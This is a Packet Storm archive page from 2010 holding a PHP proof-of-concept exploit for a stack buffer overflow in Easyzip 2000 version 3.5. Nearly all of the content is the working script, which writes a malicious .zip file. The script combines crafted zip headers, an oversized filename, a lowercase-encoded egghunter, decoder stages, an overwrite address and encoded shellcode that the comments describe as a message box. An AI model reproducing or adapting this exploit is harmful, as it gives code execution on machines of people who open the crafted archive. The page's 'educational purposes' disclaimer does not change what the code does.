exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Easyzip 2000 3.5 Stack Buffer Overflow

Easyzip 2000 3.5 Stack Buffer Overflow
Posted Apr 27, 2010
Authored by mr_me

Easyzip 2000 version 3.5 stack buffer overflow exploit that creates a malicious .zip file.

tags | exploit, overflow
SHA-256 | f827dd8a007d460a0ad5d41354ebc9e4869fb479b3b111388f31bb20e701c800

Easyzip 2000 3.5 Stack Buffer Overflow

Change Mirror Download
<?php
/*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Easyzip 2000 v3.5 (.zip) 0day stack buffer overflow PoC exploit
Author: mr_me - http://net-ninja.net/
Download: http://www.thefreesite.com/ezip35.exe
Platform: Windows XP sp3
Advisory: http://www.corelan.be:8800/advisories.php?id=10-032
Greetz to: Corelan Security Team
http://www.corelan.be:8800/index.php/security/corelan-team-members/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Script provided 'as is', without any warranty.
Use for educational purposes only.
Do not use this code to do anything illegal !

Note : you are not allowed to edit/modify this code.
If you do, Corelan cannot be held responsible for any damages this may cause.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ascii lowercase and payload space < 400 bytes, yet we still get code execution.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/

// local file header
$lf_header = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00";

// central directory file header
$cdf_header = "\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";

// end of central directory record
$efcdr_record = "\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00";

// filename
$_____name = "\x6D\x72\x5F\x6D\x65\x73\x5F\x73\x65\x63\x72\x65\x63\x74".
"\x5F\x70\x61\x73\x73\x77\x6F\x72\x64\x73\x2E\x74\x78\x74";

// corelan security team msgbox
$_____sc = "VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJEON4F1W9M490R0P08654E2".
"M9Y2F64346K5K450115MN2G0N0B0L5C5DKO106737KO9W8P0O2L1L0P184E3U0Q8P1G3L5O9R601E671O9W".
"343QOO113RJOLK8M640M1K3WOL1W4Y2O613V2I4K5C0R0S0PMO2O3W2O8K9R1Z1K0S1H3PLMKM5KKK8M0S4".
"JJL15612J1267KM2K4D903K03";

// lowercase ascii encoded egghunter
$eh = "j314d34djq34djk34d1431s11s7j314d34dj234dkms502ds5o0d35upj51g4241n20b0d5".
"225737445m51c5k5dk4j49b591e7b5k4k385bk2j55bk59359927";

$decoderStage1 = "\x25\x4a\x4d\x4e\x55\x25\x35\x08\x31\x2a".
"\x2d\x49\x49\x49\x5e\x2d\x4a\x49\x4a\x5e\x2d\xc1\xc1\xc1\x5f";

$decoderStage2 = "\x25\x4A\x4d\x4e\x55\x25\x10\x10\x31\x10".
"\x2d\x2a\x69\x37\xc1\x2d\x2a\x69\x36\xc1\x2d\x2b\x6a\xb1\x9b";

$align = "\x60".str_repeat("\x5d",7);

$___exploit = $_____name.str_repeat("\x61",249).$eh.str_repeat("\x61",144-strlen($eh))."\x60".
str_repeat("\x5b",8).$decoderStage1.$align.$decoderStage2.$align."\x98\x8e\x89\xf1\x64\x64".
"\x16\x32\x40\x00";
$___exploit .= str_repeat("\x61",2000-strlen($___exploit))."\x57\x30\x30\x54\x57\x30\x30\x54".$_____sc.
str_repeat("\x61",2056-strlen($_____sc))."\x2e\x74\x78\x74";

$_____b00m = $lf_header.$___exploit.$cdf_header.$___exploit.$efcdr_record;
file_put_contents("cst-easyzip.zip",$_____b00m);
?>
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close